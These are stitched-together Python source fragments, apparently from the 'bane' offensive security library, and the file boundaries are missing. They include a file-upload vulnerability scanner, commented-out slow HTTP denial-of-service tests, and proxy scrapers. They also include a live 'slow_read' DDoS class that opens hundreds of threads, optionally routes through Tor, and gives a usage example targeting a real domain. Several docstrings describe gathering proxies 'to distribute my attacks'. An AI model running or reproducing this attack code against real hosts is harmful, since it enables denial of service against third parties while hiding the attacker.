            elif r.status_code == 200 and any(i in r.text for i in l):
                if show_warnings == True:
                    print(
                        "Warning: HTTP Status Code: 200 , but we didn't find some of our submitted data, so it's probably vulnerable but they are saved somewhere else..\nPlease check manually by visiting the form again"
                    )
                result.append({"form":fo,"vulnerable":True, 'status':"HTTP Status Code: 200 , but we didn't find some of our submitted data, so it's probably vulnerable but they are saved somewhere else..\nPlease check manually by visiting the form again"
                    })
            elif r.status_code == 200 and not any(i in r.text for i in l):
                if show_warnings == True:
                    print(
                        "Warning: HTTP Status Code: 200 , but we didn't find our submitted data, so it's probably vulnerable but they are saved somewhere else..\nPlease check manually by visiting the form again"
                    )
                result.append({"form":fo,"vulnerable": True, 'status':"HTTP Status Code: 200 , but we didn't find our submitted data, so it's probably vulnerable but they are saved somewhere else..\nPlease check manually by visiting the form again"})
        except Exception as ex:
            #raise(ex)
            pass#result.append({"form":fo,"vulnerable": False, 'status':"Found no data and Status Code NOT: 200"})
    return result



def file_upload(
    u,
    max_pages=5,
    logs=True,
    proxy=None,
    timeout=10,
    show_warnings=True,
    user_agent=None,
    cookie=None,
    replaceble_parameters={"phpvalue": ((".", ""),)},
    file_extension="png",
    fill_empty=10,
    referer=None,
    leave_empty=[],
    dont_send=[],
    mime_type=None,
    predefined_inputs={},
    pages=[],
    headers={}
):
    l=[]
    if pages==[]:
        pages=spider_url(u,cookie=cookie,max_pages=max_pages,timeout=timeout,user_agent=user_agent,proxy=proxy)
    for x in pages:
        if logs==True:
            print('\n\nPage: {}\n'.format(x))
        result=file_upload_forms(x,
                                proxy=proxy,
                                timeout=timeout,
                                show_warnings=show_warnings,
                                user_agent=user_agent,
                                cookie=cookie,
                                replaceble_parameters=replaceble_parameters,
                                file_extension=file_extension,
                                fill_empty=fill_empty,
                                referer=referer,
                                leave_empty=leave_empty,
                                dont_send=dont_send,
                                mime_type=mime_type,
                                predefined_inputs=predefined_inputs,
                                headers=headers)
        #result={'vulnerable':result[0],'status':result[1]}
        if logs==True:
            for r in result:
                print(r)
        if result!=[]:
            l.append({'page':x,'result':result})
    return  l#[x for x in l if x['result']['vulnerable']!=False]



from bane.scanners.network_protocols.chargen import *
from bane.scanners.network_protocols.dns import *
from bane.scanners.network_protocols.echo import *
from bane.scanners.network_protocols.memcache import *
from bane.scanners.network_protocols.ntp import *
from bane.scanners.network_protocols.snmp import *
from bane.scanners.network_protocols.ssdp import *


"""
'''
  the following functions are used to check any kind of Slow HTTP attacks vulnerabilities that will lead to a possible DoS.
'''

def build_get(u,p,timeout=5):
    s =socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    s.connect((u,p))
    if ((p==443 ) or (p==8443)):
     s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
    s.send("GET {} HTTP/1.1\r\n".format(random.choice(paths)).encode("utf-8"))
    s.send("User-Agent: {}\r\n".format(random.choice(ua)).encode("utf-8"))
    s.send("Accept-language: en-US,en,q=0.5\r\n".encode("utf-8"))
    s.send("Connection: keep-alive\r\n".encode("utf-8"))
    return s

def headers_timeout_test(u,port=80,timeout=5,max_timeout=30,logs=True):
 i=0
 if logs==True:
  print("[*]Test has started:\nTarget: {}\nPort: {}\nInitial connection timeout: {}\nMax interval: {}".format(u,port,timeout,max_timeout))
 try:
  s=build_get(u,port,timeout=timeout)
  i+=1
 except:
  if logs==True:
   print("[-]Connection failed")
  return 0
 if i>0:
  j=0
  while True:
   try:
    j+=1
    if j>max_timeout:
     break
    if logs==True:
     print("[*]Sending payload...")
    s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
    if logs==True:
     print("[+]Sleeping for {} seconds...".format(j))
    time.sleep(j)
   except:
    if logs==True:
     print("==>timed out at: {} seconds".format(j))
     break
    return j
  if j>max_timeout:
   if logs==True:
    print("==>Test has reached the max interval: {} seconds without timing out".format(duration))
   return j

def slow_get_test(u,port=80,timeout=5,interval=5,randomly=False,duration=180,logs=True,min_wait=1,max_wait=5):
 i=0
 if logs==True:
  print("[*]Test has started:\nTarget: {}\nPort: {}\nInitial connection timeout: {}\nInterval between packets:{}\nTest duration: {} seconds".format(u,port,timeout,interval,duration))
 try:
  s=build_get(u,port,timeout=timeout)
  i+=1
 except:
  if logs==True:
   print("[-]Connection failed")
  return 0
 if i>0:
  j=time.time()
  while True:
   try:
    ti=time.time()
    if int(ti-j)>=duration:
     break
    if logs==True:
     print("[*]Sending payload...")
    s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
    t=interval
    if randomly==True:
     t=random.randint(min_wait,max_wait)
    if logs==True:
     print("[+]Sleeping for {} seconds...".format(t))
    time.sleep(t)
   except Exception as e:
    pass
    if logs==True:
     print("==>timed out at: {} seconds".format(int(ti-j)))
    return int(ti-j)
    break
  if int(ti-j)>=duration:
   if logs==True:
    print("==>Test has reached the max interval: {} seconds without timing out".format(duration))
   return int(ti-j)

def max_connections_limit(u,port=80,connections=150,timeout=5,duration=180,logs=True,payloads=True):
 l=[]
 if logs==True:
  print("[*]Test has started:\nTarget: {}\nPort: {}\nConnections to create: {}\nInitial connection timeout: {}\nTest duration: {} seconds".format(u,port,connections,timeout,duration))
 ti=time.time()
 while True:
  if int(time.time()-ti)>=duration:
   if logs==True:
    print("[+]Maximum time for test has been reached!!!")
    break
   return len(l)
  if len(l)==connections:
   if logs==True:
    print("[+]Maximum number of connections has been reached!!!")
   if returning==True:
    return connections 
   break
  try:
   so=build_get(u,port,timeout=timeout)
   l.append(so)
  except Exception as e:
   pass
  if payloads==True:
   for s in l:
    try:
     s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
    except:
     l.remove(s)
  if logs==True:
   print("[!]Sockets: {} Time: {} seconds".format(len(l),int(time.time()-ti)))

def build_post(u,p,timeout=5,size=10000):
 s =socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.settimeout(timeout)
 s.connect((u,p))
 if ((p==443 ) or (p==8443)):
  s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
 s.send("POST {} HTTP/1.1\r\nUser-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: {}\r\n\r\n".format(random.choice(paths),random.choice(ua),random.randint(300,1000),size,u).encode("utf-8"))
 return s

def slow_post_test(u,port=80,logs=True,timeout=5,size=10000,duration=180,randomly=False,wait=1,min_wait=1,max_wait=5):
 i=0
 if logs==True:
  print("[*]Test has started:\nTarget: {}\nPort: {}\nData length to post: {}\nInitial connection timeout:{}\nTest duration: {} seconds".format(u,port,size,timeout,duration))
 try:
  s=build_post(u,port,timeout=timeout,size=size)
  i+=1
 except Exception as e:
  if logs==True:
   print("[-]Connection failed")
  return 0
 j=0
 if i>0:
  t=time.time()
  while True:
   if int(time.time()-t)>=duration:
    if logs==True:
     print("[+]Maximum time has been reached!!!\n==>Size: {}\n==>Time: {}".format(j,int(time.time()-t)))
    return int(time.time()-t)
   if j==size:
    if logs==True:
     print("[+]Maximum size has been reached!!!\n==>Size: {}\n==>Time: {}".format(j,int(time.time()-t)))
    return int(time.time()-t)
   try:
    h=random.choice(lis)
    s.send(h.encode("utf-8"))
    j+=1
    if logs==True:
     print("Posted: {}".format(h))
    if randomly==True:
     time.sleep(random.randint(min_wait,max_wait))
    if randomly==False:
     try:
      time.sleep(wait)
     except KeyboardInterrupt:
      if logs==True:
       print("[-]Cant send more\n==>Size: {}\n==>Time:{}".format(j,int(time.time()-t)))
      return int(time.time()-t)
   except Exception as e:
    if logs==True:
     print("[-]Cant send more\n==>Size: {}\n==>Time:{}".format(j,int(time.time()-t)))
    return int(time.time()-t)

def slow_read_test(u,port=80,logs=True,timeout=5,duration=180,randomly=False,wait=5,min_wait=1,max_wait=10):
  i=0
  if logs==True:
   print("[*]Test has started:\nTarget: {}\nPort: {}\nInitial connection timeout: {}\nTest duration: {} seconds".format(u,port,timeout,duration))
  ti=time.time()
  try: 
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.settimeout(timeout)
    s.connect((u,port))
    if ((port==443 ) or (port==8443)):
     s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
    while True:
     if time.time()-ti>=duration:
      if logs==True:
       print("[+]Maximum time has been reached!!!")
      return int(time.time()-ti)
     pa=random.choice(paths)
     try:
      g=random.randint(1,2)
      if g==1:
       s.send("GET {} HTTP/1.1\r\nUser-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nHost: {}\r\n\r\n".format(pa,random.choice(ua),random.randint(300,1000),u).encode("utf-8"))
      else:
       q='q='
       for i in range(10,random.randint(20,50)):
        q+=random.choice(lis)
       s.send("POST {} HTTP/1.1\r\nUser-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: {}\r\n\r\n{}".format(pa,random.choice(ua),random.randint(300,1000),len(q),u,q).encode("utf-8"))
      d=s.recv(random.randint(1,3))
      if logs==True:
       print("Received: {}".format(str(d.decode('utf-8'))))
      print("sleeping...")
      if randomly==True:
       time.sleep(random.randint(min_wait,max_wait))
      if randomly==False:
       time.sleep(wait)
     except:
      break
    s.close()
  except Exception as e:
    pass
  if logs==True:
   print("==>connection closed at: {} seconds".format(int(time.time()-ti)))
  return int(time.time()-ti)

"""




from bane.ddos.utils import *
"""
   this tool is to perform slow reading attack. i read about this type of attacks on: https://blog.qualys.com/tag/slow-http-attack and tried to do the same thing in python (but in a better way though :p ). on this attack, the attacker is sending a full legitimate HTTP request but reading it slowly to keep the connection open as long as possible. here im doing it a bit different of the original attack with slowhttptest, im sending a normal HTTP request on each thread then read a small part of it (between 1 to 3 bytes randomly sized) then it sleeps for few seconds (3 to 5 seconds randomly sized too), then it sends another request and keep doing the same and keeping the connection open forever.

   it takes the following parameters:

   u: target ip or domain
   p: (set by default to: 80)
   threads: (set by default to: 500) number of connections
   timeout: (set by default to: 5) connection timeout flag 

   example:

   >>>import bane
   >>>bane.slow_read_attack('www.google.com',p=443,threads=300,timeout=7)

"""


class slow_read(DDoS_Class):
    def __init__(
        self,
        u,
        p=80,
        cookie=None,
        user_agents=None,
        paths=["/"],
        threads_daemon=True,
        threads=500,
        timeout=5,
        min_speed=3,
        max_speed=5,
        max_read=3,
        min_read=1,
        logs=False,
        tor=False,
        duration=60,
    ):
        self.counter = 0
        self.cookie = cookie
        self.user_agents = user_agents
        if not self.user_agents or len(self.user_agents) == 0:
            self.user_agents = ua
        self.stop = False
        self.target = u
        self.port = p
        self.paths = paths
        self.timeout = timeout
        self.tor = tor
        self.read_max = max_read
        self.read_min = min_read
        self.min_speed = min_speed
        self.max_speed = max_speed
        self.logs = logs
        self.duration = duration
        self.start = time.time()
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
            except:
                pass

    def attack(self):
        try:
            time.sleep(1)
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
                    if self.tor == False:
                        s.settimeout(self.timeout)
                    if self.tor == True:
                        s.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True)
                    s.connect((self.target, self.port))
                    if (self.port == 443) or (self.port == 8443):
                        s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
                    while True:
                        if (
                            int(time.time() - self.start) >= self.duration
                        ):  # this is a safety mechanism so the attack won't run forever
                            break
                        if self.stop == True:
                            break
                        try:
                            s.send(
                                setup_http_packet(
                                    self.target,
                                    3,
                                    self.paths,
                                    2,
                                    8,
                                    10,
                                    50,
                                    self.cookie,
                                    self.user_agents,
                                ).encode("utf-8")
                            )
                            self.counter += 1
                            while True:
                                d = s.recv(random.randint(self.read_min, self.read_max))
                                if self.logs == True:
                                    sys.stdout.write(
                                        "\rReceived: {}   ".format(
                                            str(d.decode("utf-8").strip())
                                        )
                                    )
                                    sys.stdout.flush()
                                    # print("Received: {}".format(str(d.decode('utf-8'))))
                            time.sleep(random.randint(self.min_speed, self.max_speed))
                        except:
                            break
                    s.close()
                except:
                    pass
            self.kill()
        except:
            pass



import gc

def get_current_instances(instance_type):
    active = []
    inactive = []
    b = list(gc.get_objects())
    for x in b:
        try:
            if "bane." + instance_type in x.__repr__():
                try:
                    if x.done() == True:
                        inactive.append(x)
                    else:
                        active.append(x)
                except:
                    pass
        except:
            pass
    return {"active": active, "inactive": inactive}




import requests, socks, socket, random, re,os,sys
import bs4
from bs4 import BeautifulSoup
from bane.common.payloads import *
from bane.utils.pager import crawl


def proxyscrape(protocol="http", timeout=10, country="all", ssl="all", anonymity="all"):
    if protocol.lower() not in ("http", "socks4", "socks5", "all"):
        raise Exception(
            'protocol value must be: "http" or "socks4" or "socks5" or "all"'
        )
    if ssl.lower() not in ("no", "yes", "all"):
        raise Exception('protocol value must be: "no" or "yes" or "all"')
    if anonymity.lower() not in ("elite", "anonymous", "transparent", "all"):
        raise Exception(
            'protocol value must be: "elite" or "anonymous" or "transparent" or "all"'
        )
    return requests.get(
        "https://api.proxyscrape.com/v2/?request=getproxies&protocol="
        + protocol
        + "&timeout="
        + str(timeout * 1000)
        + "&country="
        + country
        + "&ssl="
        + ssl
        + "&anonymity="
        + anonymity,
        headers={"User-Agent": random.choice(ua)},
    ).text.split("\r\n")


def proxy_check(ip, p, proto="http",username=None,password=None, timeout=5):
    """
    this function is to check if the proxy is dead or not.

    it takes the following arguments:

    proto: (set by default to: http) the proxy type: http/https/socks4/socks5
    ip: proxy's ip
    p: proxy's port
    timeout: (set by default to: 5) the connection's timeout
    """
    i = False
    if proto == "http":
        if username==None and password==None:
            proxy={"http": "http://{}:{}".format(ip,p)}
        else:
            proxy={"http": "http://{}:{}@{}:{}".format(username,password,ip,p)}
        try:
            requests.get(
                "http://ipinfo.io/ip",
                proxies=proxy,
                headers={"User-Agent": random.choice(ua)},
                timeout=timeout,
            )
            i = True
        except:
            pass
    elif proto == "socks4":
        try:
            s = socks.socksocket()
            s.setproxy( 
                    proxy_type=socks.SOCKS4,
                    addr=ip,
                    port=p,
                    username=username,
                    password=password,
            )
            s.settimeout(timeout)
            s.connect(("www.google.com", 80))
            s.close()
            i = True
        except:
            pass
    elif proto == "socks5":
        try:
            s = socks.socksocket()
            s.setproxy( 
                    proxy_type=socks.SOCKS5,
                    addr=ip,
                    port=p,
                    username=username,
                    password=password,
            )
            s.settimeout(timeout)
            s.connect(("www.google.com", 80))
            s.close()
            i = True
        except:
            pass
    return i


def get_tor_socks5_proxy_windows(host=tor_proxy_host,port=tor_proxy_socks5_port_windows):
    proxy=tor_socks5_proxy.copy()
    for x in proxy:
        proxy[x]=proxy[x].format(host,port)
    return proxy


def get_tor_socks5_proxy_linux(host=tor_proxy_host,port=tor_proxy_socks5_port_linux):
    proxy=tor_socks5_proxy.copy()
    for x in proxy:
        proxy[x]=proxy[x].format(host,port)
    return proxy


def get_tor_socks5_proxy():
    if (sys.platform.lower() == "win32") or (sys.platform.lower() == "win64"):
        return get_tor_socks5_proxy_windows()
    return get_tor_socks5_proxy_linux()


def get_tor_http_proxy(host=tor_proxy_host,port=tor_proxy_http_port):
    proxy=tor_http_proxy.copy()
    for x in proxy:
        proxy[x]=proxy[x].format(host,port)
    return proxy


def get_burpsuit_proxy(host=burpsuit_proxy_host,port=burpsuit_proxy_port):
    proxy=burpsuit_http_proxy.copy()
    for x in proxy:
        proxy[x]=proxy[x].format(host,port)
    return proxy


def get_socks5_proxy_socket(host,port,proxy_host,proxy_port,username=None,password=None):
    try:
        s = socks.socksocket()
        s.setproxy( 
                    proxy_type=socks.SOCKS5,
                    addr=proxy_host,
                    port=proxy_port,
                    username=username,
                    password=password,
            )
        s.connect((host,port))
        return s
    except:
        return


def get_socks4_proxy_socket(host,port,proxy_host,proxy_port,username=None,password=None):
    try:
        s = socks.socksocket()
        s.setproxy( 
                    proxy_type=socks.SOCKS4,
                    addr=proxy_host,
                    port=proxy_port,
                    username=username,
                    password=password,
            )
        s.connect((host,port))
        return s
    except:
        return


def get_http_proxy_socket(host,port,proxy_host,proxy_port,username=None,password=None):
    try:
        s = socks.socksocket()
        s.setproxy( 
                    proxy_type=socks.HTTP,
                    addr=proxy_host,
                    port=proxy_port,
                    username=username,
                    password=password,
            )
        s.connect((host,port))
        return s
    except:
        return


def get_socks5_proxy(proxy_host,proxy_port,username=None,password=None):
    if username==None and password==None:
        return {'http': 'socks5h://{}:{}'.format(proxy_host,proxy_port), 'https': 'socks5h://{}:{}'.format(proxy_host,proxy_port)}
    return {'http': 'socks5h://{}:{}@{}:{}'.format(username,password,proxy_host,proxy_port), 'https': 'socks5h://{}:{}@{}:{}'.format(username,password,proxy_host,proxy_port)}


def get_socks4_proxy(proxy_host,proxy_port,username=None,password=None):
    if username==None and password==None:
        return {'http': 'socks4h://{}:{}'.format(proxy_host,proxy_port), 'https': 'socks4h://{}:{}'.format(proxy_host,proxy_port)}
    return {'http': 'socks4h://{}:{}@{}:{}'.format(username,password,proxy_host,proxy_port), 'https': 'socks4h://{}:{}@{}:{}'.format(username,password,proxy_host,proxy_port)}


def get_http_proxy(proxy_host,proxy_port,username=None,password=None):
    if username==None and password==None:
        return {'http': 'http://{}:{}'.format(proxy_host,proxy_port), 'https': 'http://{}:{}'.format(proxy_host,proxy_port)}
    return {'http': 'http://{}:{}@{}:{}'.format(username,password,proxy_host,proxy_port), 'https': 'http://{}:{}@{}:{}'.format(username,password,proxy_host,proxy_port)}



'''def masshttp(count=None, timeout=15):
    """
    this function gather up thousands of HTTP / HTTPS proxies from www.proxyserverlist24.top and proxy-daily.com
    those proxies are not recommended to be used as reliable ones all the time, i use them here just to distribute my attacks
    on next functions...
    if you are willing to use them please check them first!!!
    the function takes an argument (*args) which is the number of proxies to return, in case of no argument given it will
    return the whole list.
    usage:
    >>>import bane
    >>>bane.masshttp()
    >>>bane.masshttp(1500)
    """
    if count != None:
        m = count
    else:
        m = 999999
    u = "http://www.proxyserverlist24.top/#"
    t = []
    l = []
    h = []
    try:
        h3tags1 = crawl(u, timeout=timeout)
        h3tags = []
        for x in h3tags1.keys():
            h3tags.append(h3tags1[x][1])
        for a in h3tags:
            try:
                if ("proxy-server" in str(a)) and ("#" not in (str(a))):
                    try:
                        if a not in l:
                            l.append(a)
                    except Exception as xx:
                        pass
            except Exception as ex:
                pass
                continue
    except Exception as e:
        pass
    for u in l:
        try:
            a = requests.get(
                u, headers={"User-Agent": random.choice(ua)}, timeout=timeout
            )
            ips = re.findall(
                "(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})",
                a.text,
            )
            t += ips
        except Exception as e:
            pass
    l = []
    u = "https://www.dailyfreeproxy.com/#"
    try:
        h3tags1 = crawl(u, timeout=timeout)
        h3tags = []
        for x in h3tags1.keys():
            h3tags.append(h3tags1[x][1])
        for a in h3tags:
            try:
                if ("-http" in str(a)) and ("#" not in (str(a))):
                    try:
                        a = str(a)
                        if a not in l:
                            l.append(a)
                    except Exception as xx:
                        pass
            except Exception as ex:
                continue
    except Exception as e:
        pass
    for u in l:
        try:
            a = requests.get(
                u, headers={"User-Agent": random.choice(ua)}, timeout=timeout
            )
            ips = re.findall(
                "(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})",
                a.text,
            )
            t += ips
        except Exception as e:
            pass
        u = "http://proxy-daily.com/#"
        try:
            r = requests.get(
                u, headers={"User-Agent": random.choice(ua)}, timeout=timeout
            ).text
            soup = BeautifulSoup(r, "html.parser")
            l = soup.findAll("div")
        except:
            pass
        p = []
        ips = []
        for x in l:
            try:
                ips = re.findall(
                    "(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})",
                    str(x),
                )
                if (ips) and (ips not in p):
                    p.append(ips)
            except:
                pass
    try:
        t += p[0]
    except:
        pass
    if count != None:
        while True:
            o = random.choice(t)
            h.append(o)
            if (len(h) == m) or (len(h) == len(t)):
                break
    else:
        h = t
    return h


def massocks4(count=None, timeout=15):
    """
    this function gather up thousands of SOCKS4 proxies from www.proxyserverlist24.top and proxy-daily.com
    those proxies are not recommended to be used as reliable ones all the time, i use them here just to distribute my attacks
    on next functions...
    if you are willing to use them please check them first!!!
    the function takes an argument (*args) which is the number of proxies to return, in case of no argument given it will
    return the whole list.

    usage:

    >>>import bane
    >>>bane.massocks4()

    >>>bane.massocks4(100)
    """
    if count != None:
        m = count
    else:
        m = 999999
    s4 = []
    t = []
    l = []
    u = "https://www.dailyfreeproxy.com/#"
    try:
        h3tags1 = crawl(u, timeout=timeout)
        h3tags = []
        for x in h3tags1.keys():
            h3tags.append(h3tags1[x][1])
        for a in h3tags:
            try:
                if ("-socks4" in str(a)) and ("#" not in (str(a))):
                    try:
                        a = str(a)
                        if a not in l:
                            l.append(a)
                    except Exception as xx:
                        pass
            except Exception as ex:
                continue
    except Exception as e:
        pass
    for u in l:
        try:
            a = requests.get(
                u, headers={"User-Agent": random.choice(ua)}, timeout=timeout
            )
            ips = re.findall(
                "(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})",
                a.text,
            )
            t += ips
        except Exception as e:
            pass
    l = []
    u = "http://proxy-daily.com/#"
    try:
        r = requests.get(
            u, headers={"User-Agent": random.choice(ua)}, timeout=timeout
        ).text
        soup = BeautifulSoup(r, "html.parser")
        l = soup.findAll("div")
    except Exception as e:
        pass
    p = []
    for x in l:
        try:
            ips = re.findall(
                "(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})",
                str(x),
            )
            if (ips) and (ips not in p):
                p.append(ips)
        except Exception as x:
            pass
    try:
        t += p[2]
    except:
        pass
    if count != None:
        while True:
            o = random.choice(t)
            s4.append(o)
            if (len(s4) == m) or (len(s4) == len(t)):
                break
    else:
        s4 = t
    return s4


def massocks5(count=None, timeout=15):
    """
    this function gather up thousands of SOCKS5 proxies from www.proxyserverlist24.top and proxy-daily.com
    those proxies are not recommended to be used as reliable ones all the time, i use them here just to distribute my attacks
    on next functions...
    if you are willing to use them please check them first!!!
    the function takes an argument which is the number of proxies to return (*args) , in case of no argument given it will
    return the whole list.

    usage:

    >>>import bane
    >>>bane.massocks5()

    >>>bane.massocks5(500)
    """
    if count != None:
        m = count
    else:
        m = 999999
    l = []
    t = []
    u = "https://www.dailyfreeproxy.com/#"
    try:
        h3tags1 = crawl(u, timeout=timeout)
        h3tags = []
        for x in h3tags1.keys():
            h3tags.append(h3tags1[x][1])
        for a in h3tags:
            try:
                if ("-socks5" in str(a)) and ("#" not in (str(a))):
                    try:
                        a = str(a)
                        if a not in l:
                            l.append(a)
                    except Exception as xx:
                        pass
            except Exception as ex:
                continue
    except Exception as e:
        pass
    for u in l:
        try:
            a = requests.get(
                u, headers={"User-Agent": random.choice(ua)}, timeout=timeout
            )
            ips = re.findall(
                "(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})",
                a.text,
            )
            t += ips
        except Exception as e:
            pass
    u = "http://www.live-socks.net/#"
    l = []
    s5 = []
    try:
        r = requests.get(
            u, headers={"User-Agent": random.choice(ua)}, timeout=timeout
        ).text
        soup = BeautifulSoup(r, "html.parser")
        h3 = soup.find_all("h3", class_="post-title entry-title")
        for ha in h3:
            h3tags = ha.find_all("a")
            for a in h3tags:
                try:
                    a = str(a)
                    if "socks-5" in a:
                        a = a.split('href="')[1]
                        a = a.split('"')[0]
                        if a not in l:
                            l.append(a)
                except Exception as ex:
                    continue
    except Exception as e:
        pass
    for u in l:
        try:
            a = requests.get(
                u, headers={"User-Agent": random.choice(ua)}, timeout=timeout
            )
            ips = re.findall(
                "(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})",
                a.text,
            )
            for x in ips:
                if x not in t:
                    t.append(x)
        except Exception as e:
            pass
    if count != None:
        while True:
            o = random.choice(t)
            s5.append(o)
            if (len(s5) == m) or (len(s5) == len(t)):
                break
    else:
        s5 = t
    return s5


def http(logs=True, count=300, timeout=15):
    """
    this function gather up hundreds of HTTP proxies from many sources.
    those proxies are recommended to be used as reliable ones all the time.
    the function takes an argument which is the number of proxies to return (*args) , in case of no argument given it will
    return the whole list,and another argument (logs) which is set by default to True so you can see the process of the function, you can turn
    off the the typing if you set it to: False.

    usage:

    >>>import bane
    >>>bane.http()

    >>>bane.http(300)"""
    hsl = []
    u = "https://free-proxy-list.net/"
    try:
        if logs == True:
            print("[+]Checking: {}".format(u))
        c = requests.get(u, timeout=timeout).text
        a = 0
        soup = BeautifulSoup(c, "html.parser")
        y = soup.find_all("tr")
        for x in y:
            try:
                a += 1
                x = str(x)
                ip = x.split("<tr><td>")[1].split("=")[0]
                ip = ip.split("</td>")[0].split("=")[0]
                p = x.split("</td><td>")[1].split("=")[0]
                p = p.split("</td>")[0].split("=")[0]
                pr = ip + ":" + p
                if pr not in hsl:
                    hsl.append(pr)
                    if (a > 300) or (len(hsl) == count):
                        break
            except Exception as e:
                pass
    except Exception as e:
        pass
    """
 for i in range(1,7):
  if len(hsl)==count:
    break
  try:
   u='https://list.proxylistplus.com/Fresh-HTTP-Proxy-List-'+str(i)
   if logs==True:
    print("[+]Checking: {}".format(u))
   c=requests.get(u,timeout=timeout).text
   soup = BeautifulSoup(c,"html.parser")
   y= soup.find_all("tr")
   for x in y:
    try:
     z = x.find_all('td')
     if "strong" in str(z):
       pass 
     else:
      ip= str(z[1]).split('<td>')[1].split('=')[0]
      ip=ip.split('</td>')[0].split('=')[0]
      p= str(z[2]).split('<td>')[1].split('=')[0]
      p=p.split('</td>')[0].split('=')[0]
      pr=ip+':'+p
      if pr not in hsl:
       hsl.append(pr)
       if len(hsl)==count:
         break
    except Exception as e:
     pass
  except Exception as e:
   pass
 """
    ur = [
        "http://www.gatherproxy.com/proxylist/anonymity/?t=Elite",
        "http://www.gatherproxy.com/proxylist/anonymity/?t=Anonymous",
    ]
    for u in ur:
        if len(hsl) == count:
            break
        try:
            if logs == True:
                print("[+]Checking: {}".format(u))
            y = []
            c = requests.get(u, timeout=timeout).text
            soup = BeautifulSoup(c, "html.parser")
            for r in soup.find_all("script"):
                h = "".join(map(str, r.contents))
                if "gp.insertPrx" in h:
                    s = h.split(":")
                    ip = s[3].split(",")[0].replace('"', "")
                    p = str(int(s[5].split(",")[0].replace('"', ""), 16))
                    pr = ip + ":" + p
                    if pr not in hsl:
                        hsl.append(pr)
                        if len(hsl) == count:
                            break
        except Exception as e:
            pass
    return hsl


def https(logs=True, count=200, timeout=15):
    """
    this function gather up hundreds of HTTPS proxies from many sources.
    those proxies are recommended to be used as reliable ones all the time.
    the function takes an argument which is the number of proxies to return (*args) , in case of no argument given it will
    return the whole list,and another argument (logs) which is set by default to True so you can see the process of the function, you can turn
    off the the typing if you set it to: False.

    usage:

    >>>import bane
    >>>bane.https()

    >>>bane.https(200)
    """
    dn = "abcdefghijklmnopqrstuvwxyz"
    hl = []
    u = "https://www.sslproxies.org/"
    try:
        if logs == True:
            print("[+]Checking: {}".format(u))
        c = requests.get(u, timeout=timeout).text
        soup = BeautifulSoup(c, "html.parser")
        y = soup.find_all("tr")
        a = 0
        for x in y:
            try:
                x = str(x)
                ip = x.split("</td>")[0].split("=")[0]
                ip = ip.split("<tr><td>")[1].split("=")[0]
                p = x.split("</td><td>")[1].split("=")[0]
                p = p.split("</td>")[0].split("=")[0]
                d = False
                for o in dn:
                    if (o in ip.lower()) or (o in p.lower()):
                        d = True
                if d == False:
                    pr = ip + ":" + p
                    a += 1
                    if pr not in hl:
                        hl.append(pr)
                        if (a == 200) or (len(hl) == count):
                            a = 0
                            break
            except:
                pass
    except:
        pass
    hl = hl[0 : len(hl) - 4]
    """
 ur=['https://list.proxylistplus.com/ssl-List-1', 'https://list.proxylistplus.com/ssl-List-2']
 for u in ur:
  if len(hl)==count:
    break
  try:
   if logs==True:
    print("[+]Checking: {}".format(u))
   c=requests.get(u,timeout=timeout).text
   soup = BeautifulSoup(c,"html.parser")
   y= soup.find_all("tr")
   for x in y:
    try:
     z = x.find_all('td')
     if "strong" in str(z):
      pass 
     else:
       ip= str(z[1]).split('<td>')[1].split('=')[0]
       ip=ip.split('</td>')[0].split('=')[0]
       p= str(z[2]).split('<td>')[1].split('=')[0]
       p=p.split('</td>')[0].split('=')[0]
       d=False
       for o in dn:
        if ((o in ip.lower()) or (o in p.lower())):
         d=True
       if d==False:
        pr=ip+':'+p
        a+=1
        if pr not in hl:
         hl.append(pr)
         if (len(hl)==count):
          break
    except Exception as e:
     pass
  except Exception as e:
   pass
 """
    return hl


def socks5(logs=True, count=100, timeout=15):
    """
    this function gather up hundreds of SOCKS5 proxies from many sources.
    those proxies are recommended to be used as reliable ones all the time.
    the function takes an argument which is the number of proxies to return (*args) , in case of no argument given it will
    return the whole list,and another argument (logs) which is set by default to True so you can see the process of the function, you can turn
    off the the typing if you set it to: False.

    usage:

    >>>import bane
    >>>bane.socks5()

    >>>bane.socks5(50)"""
    s5l = []
    u = "https://www.socks-proxy.net/"
    try:
        if logs == True:
